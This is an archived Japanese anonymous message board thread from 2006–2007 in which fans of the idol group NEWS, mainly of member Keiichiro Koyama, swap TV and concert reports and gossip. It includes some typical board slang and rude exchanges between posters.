Q麺の謎をフリップで説明しているところでリンスがビビリという話から
ジェットコースター系がダメと言ったらパラが熱烈賛同しててちょっぴりキャ(ry
急行チビちゃんたちが歌スタンバイしている間にパラと○で兄弟喧嘩するかどうかという雑談
パラは姉とはもう喧嘩しないと言ってて○は妹とは喧嘩したことないらしい
○がソロ曲を終えた後すぐMCで腰を曲げてゼエゼエ言ってる姿を
前に両手両足を広げて立ってカメラから隠す真似をするパラ
前回自分が同じ立場で辛かったと○に同調してた

148 :ユー&名無しネ:2006/12/13(水) 14:33:52 ID:qVa9Qklf
>>146うんそうだね そんなアピールいらないから、全面的にあのえろそうな目をもっと生かしていくべきだと思う!優しそうだけど小山くんの目ちょっとこわい‥あのちょっと危ない目でチェリッシュ歌われてみたいなあ

149 :ユー&名無しネ:2006/12/19(火) 00:44:19 ID:w577WHfr
パラ塩に升とエロが出てたけど
人数多いと面白い

150 :ユー&名無しネ:2006/12/23(土) 12:14:43 ID:RuD5emK7
大塚愛とはお似合い

151 :ユー&名無しネ:2006/12/23(土) 23:13:38 ID:ByXlmqGh
少蔵SPは司会に徹してたね
まあいいんだけど早く石鹸映像が使えるようになって欲しい

152 :ユー&名無しネ:2007/01/03(水) 01:29:46 ID:WWb9LX3Q
age

153 :ユー&名無しネ:2007/01/03(水) 01:48:41 ID:O/ZV/MiU
山Pの腰ギンチャクでいてよかったね
思惑どうりカウコンで復帰できたし


154 :ユー&名無しネ:2007/01/12(金) 01:06:58 ID:Fw9Op8du
嗚咽に号泣か
ポーサンと笛に抱きかかえられて泣いてたからそれだな

155 :(*゚д゚) ◆LpJR0bXBSc :2007/01/14(日) 05:09:29 ID:A9LzEA/c
スカルリングは38万(ブルガリ)

156 :ユー&名無しネ:2007/01/14(日) 08:41:57 ID:VtOXuGrw
あの日記は℃が恐ろしく怖いってことが言いたいの?
メンバーの買い物も待てない短気な奴ってことなの

157 :ユー&名無しネ:2007/01/15(月) 00:11:01 ID:atV79v64
もともと℃嫌いだからな
いい加減落とし込みやめてくれ

158 :ユー&名無しネ:2007/01/15(月) 08:48:29 ID:M1aMejU0
Pのマネするなんて百億年早いんだょ〜
シャンプー変えても顔は変わんねーからw

159 :ユー&名無しネ:2007/01/15(月) 08:53:44 ID:Yc5W4FBF
ワラ。

160 :ユー&名無しネ:2007/01/15(月) 11:49:17 ID:HVLQtult
お前の顔はどーなんだ慶一郎はカッコイイ石鹸みんなカッコイイ

161 :ユー&名無しネ:2007/01/15(月) 14:41:48 ID:VW5buENe
小山Pコンビってなんか好き
カツンがちょっとアレだから少し揺らいでる
ヤバスヤバスヤバス



162 :ユー&名無しネ:2007/01/15(月) 15:41:24 ID:ACVgCN6b
小山のメン愛見てると将来はマネージャーになりそうな予感

163 :ユー&名無しネ:2007/01/15(月) 15:50:19 ID:BcT0n47K
メン愛いい!
小山はかっこいいよ

164 :ユー&名無しネ:2007/01/15(月) 18:04:26 ID:X55vZDHY
|`レ´*)シ
こややんのキャラ好きだお
親分担だけどww


165 :ユー&名無しネ:2007/01/15(月) 18:44:30 ID:DoV0Tqyj
鰯とPが波で交換日記しててカバエエ(w

166 :ユー&名無しネ:2007/01/15(月) 19:52:48 ID:7sIKSlJz
他担ですが失礼シマス
麺愛でカバエエ自担の生態を教えてクレテdです
ホッコリしました(w最近麺らが楽しそうでイイっすね
デハ失礼しました

167 :ユー&名無しネ:2007/01/15(月) 20:27:05 ID:LxiFYf8y
パラGJ!オマイはヲタ心が嫁てさすがだとオモ

168 :ユー&名無しネ:2007/01/16(火) 20:36:48 ID:JS+ONbyl
>166
本当にカバエかったですね
麺達でキャッキャなってるとコッチもホワーンとなります(w


169 :ユー&名無しネ:2007/01/19(金) 01:39:13 ID:809WAyOq
少蔵はビジュ良かったと思う(パラヲタ比)
大柄チェックのハーフコートみたいな衣装が可愛くて似合ってた
もうひとつの丈が短い白い衣装の方は
インナーをジーンズinしてて細腰が際立っててエロスヤバスモエスだった
歌はポーが歌ってた石鹸日本に途中から参加して
2人で客席前にある台の上に立って歌ったのだけ
お便り募集の告知を噛んでやり直ししてたのがキャワワ

170 :ユー&名無しネ:2007/01/19(金) 15:03:05 ID:CHxNfCL0
小山さんの明るい髪の毛の色どう思う?
ファンレターはよく読むとか。

171 :ユー&名無しネ:2007/01/19(金) 15:07:14 ID:xGqK+BJ7
>>169
dd!
最後にかんだの毛?カワユス(*´∀`*)

172 :ユー&名無しネ:2007/01/19(金) 17:38:58 ID:rNLpI/W+
ここにいるヤシの9割ロムれ

173 :ユー&名無しネ:2007/01/20(土) 22:43:51 ID:+Kx1uWs0
もそっと男っぽく且つ鬼畜Sキャラになってくれたら一生ついて行く
あんだけS傾向なビジュしてるんだから勿体無いよカコイイのに

174 :ユー&名無しネ:2007/01/21(日) 00:03:55 ID:GfqraDqO
1/21になった!!
パラが事務所に入って丸6年オメ!!
早く紺が見たい

175 :ユー&名無しネ:2007/01/21(日) 11:40:07 ID:nxAC5wwm
アイシの連載なんだから何書いたって勝手だろうが
厨キエロ

2枚目
お前がどこに就職したかろうが何を聴いて泣こうがこっちには関係ないんじゃアフォ
本スレで自分語りしてるヤシ論外だよな
まともな姐さんカムバク
とにかく厨は消えるか一生ロムるか氏ぬかどれかにしろ

こっちに篭ってろ


176 :ユー&名無しネ:2007/01/21(日) 20:03:39 ID:7P3+xxT8
こいつの画像求む
俺さっき似てるって言われたから見てみたい

177 :ユー&名無しネ:2007/01/24(水) 02:13:33 ID:2ZvdWq7A
>176
http://busamoku.hp.infoseek.co.jp/cgi-bin/src/busamoku0933.jpg
オマエぶさなんだな(w

178 :ユー&名無しネ:2007/02/12(月) 03:03:35 ID:Sv0OkrdC
他担ですがお邪魔します
自担がいつもお世話かけっぱなしでスミマセン
今日も日記代筆の上、担萌えエピ満載してくれてdですた
石鹸日本2人のハイタッチにホコ−リ(w紺が待ち遠しいですね
今後もヨロスクです

長文スレ汚しスマソでした

179 :ユー&名無しネ:2007/02/12(月) 04:07:35 ID:yOeRGBGJ
.

180 :ユー&名無しネ:2007/02/17(土) 14:35:41 ID:r9ImtM58
http://otd12.jbbs.livedoor.jp/1000037315/bbs_plain


TVメディアも巻き込んだ大掛かりなサギ行為↑なのは確かですが・・・


企業犯罪として警察に被害届けを出したりできんの?

181 :ユー&名無しネ:2007/02/18(日) 12:26:53 ID:Rr69rYlH
>178
ゴミついてるP担何してんの?
他担姐さんdです!なんてレスすると思った?
迷惑してんだけど

32 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)